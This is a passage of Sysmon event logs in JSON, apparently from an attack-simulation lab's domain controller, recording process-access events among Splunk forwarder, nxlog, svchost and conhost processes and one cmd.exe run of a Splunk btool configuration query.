C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3323,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.253\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1100-5F25-0000-001087630500}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.253","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1100-5F25-0000-001087630500}","TargetProcessId":"5092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3324,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.410\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.410","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3325,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:44.504\r\nSourceProcessGUID: {E2A3D6B1-1100-5F25-0000-001087630500}\r\nSourceProcessId: 5092\r\nSourceThreadId: 5096\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:44.504","SourceProcessGUID":"{E2A3D6B1-1100-5F25-0000-001087630500}","SourceProcessId":"5092","SourceThreadId":"5096","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3326,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:45.411\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:45.411","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3327,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.413\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.413","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3328,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.600\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nSourceProcessId: 4864\r\nSourceThreadId: 4872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+457e6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+460cb|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+453d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d925|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.600","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","SourceProcessId":"4864","SourceThreadId":"4872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+457e6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+460cb|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+453d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d925|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3329,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.617\r\nProcessGuid: {E2A3D6B1-1102-5F25-0000-001043670500}\r\nProcessId: 1408\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nParentProcessId: 4864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.617","ProcessGuid":"{E2A3D6B1-1102-5F25-0000-001043670500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","ParentProcessId":"4864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3330,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nSourceProcessId: 4864\r\nSourceThreadId: 4872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-001043670500}\r\nTargetProcessId: 1408\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 